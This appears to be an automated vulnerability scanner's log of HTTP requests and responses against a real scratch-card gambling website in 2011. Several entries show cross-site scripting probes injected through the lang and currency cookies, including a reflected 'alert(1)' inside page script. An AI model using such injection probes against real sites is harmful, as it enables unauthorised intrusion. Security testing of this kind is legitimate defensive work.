HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:25:51 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:51 GMT; path=/ Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:25:51 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 14444 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... xt/javascript"> $(document).ready flashembed("middleflash", {src: "/images/scratch3a.swf monthlyprizetext: 'Won Last Month', monthlyprize: '$53,521,715', topprizetext: 'Scratch $2 to Win', topprizes: '$1,000,000', ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | / |
GET / HTTP/1.1 Host: scratch.co.uk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://scratch.co.uk/ Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:59:18 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/ Set-Cookie: currency=dce5d%22%3E Set-Cookie: neogamesemail=deleted%7E Content-Type: text/html Content-Length: 11363 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | / |
GET / HTTP/1.1 Host: scratch.co.uk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://scratch.co.uk/ Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:59:17 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:18 GMT; path=/ Set-Cookie: currency=USD737fc%22 Set-Cookie: neogamesemail=deleted%7E Content-Type: text/html Content-Length: 11427 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | / |
GET / HTTP/1.1 Host: scratch.co.uk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://scratch.co.uk/ Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:59:19 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/ Set-Cookie: currency=21696%22%3Balert Set-Cookie: neogamesemail=deleted%7E Content-Type: text/html Content-Length: 11229 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <script type="text/javascript"> $(document).ready flashembed("middleflash", {src: "/images/scratch3a.swf monthlyprizetext: 'Won Last Month', monthlyprize: '53,521,715', topprizetext: 'Scratch 2 to Win', ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | / |
GET / HTTP/1.1 Host: scratch.co.uk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://scratch.co.uk/ Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:59:20 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:20 GMT; path=/ Set-Cookie: currency=USD737fc%22 Set-Cookie: neogamesemail=deleted%7E Content-Type: text/html Content-Length: 11477 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... e="text/javascript"> $(document).ready flashembed("middleflash", {src: "/images/scratch3a.swf alert(1)//2182f944140', 'ENG', 'direct-173|193|214|243') monthlyprizetext: 'Won Last Month', monthlyprize: '53,521,715', topprizetext: 'Scratch 2 to Win', ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | / |
GET /?currency=USD HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:29:13 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG74696%22%3Balert Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 14310 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <script type="text/javascript"> $(document).ready flashembed("middleflash", {src: "/images/scratch3a.swf monthlyprizetext: 'Won Last Month', monthlyprize: '$53,521,715', topprizetext: 'Scratch $2 to Win', top ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | / |
GET /?currency=USD HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:29:10 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG2298d%22%3E Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:29:11 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 14558 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | / |
GET /?currency=USD HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:27:02 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:27:03 GMT; path=/ Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:27:03 GMT; path=/ Set-Cookie: neogamesemail=delete Connection: close Content-Type: text/html Content-Length: 14257 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="http://www.hopa.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /about/ |
GET /about/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:26:03 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 13261 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /about/ |
GET /about/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:29:54 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:55 GMT; path=/ Set-Cookie: currency=GBP102dc%22%3E Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 13003 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /about/ |
GET /about/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:29:11 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG2f717%22%3E Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 13112 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /contact/ |
GET /contact/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:26:08 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:08 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:08 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 15000 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /contact/ |
GET /contact/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:37 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:37 GMT; path=/ Set-Cookie: currency=GBP3fc52%22%3E Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 14998 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /contact/ |
GET /contact/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:10 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG7cf9c%22%3E Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:11 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 15000 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /help/ |
GET /help/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:25:46 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 11402 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /help/ |
GET /help/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:08 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/ Set-Cookie: currency=GBPb813a%22%3E Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 11400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /help/ |
GET /help/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:29:23 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENGc1ac7%22%3E Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:23 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 11402 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /help/deposit/methods/ |
GET /help/deposit/methods/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:26:03 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 18431 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /help/deposit/methods/ |
GET /help/deposit/methods/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:32 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:32 GMT; path=/ Set-Cookie: currency=GBPfb9ed%22%3E Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 18429 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /help/deposit/methods/ |
GET /help/deposit/methods/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:07 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENGa2c6e%22%3E Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 18534 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /help/fairplay/ |
GET /help/fairplay/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:25:50 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 12387 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /help/fairplay/ |
GET /help/fairplay/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:08 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:10 GMT; path=/ Set-Cookie: currency=GBPd8329%22%3E Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 12278 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /help/fairplay/ |
GET /help/fairplay/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:29:24 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG29be1%22%3E Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:24 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 12387 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /help/privacy/ |
GET /help/privacy/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:25:56 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:57 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:57 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 17257 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /help/privacy/ |
GET /help/privacy/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:34 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:35 GMT; path=/ Set-Cookie: currency=GBPff73f%22%3E Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 17101 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /help/privacy/ |
GET /help/privacy/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
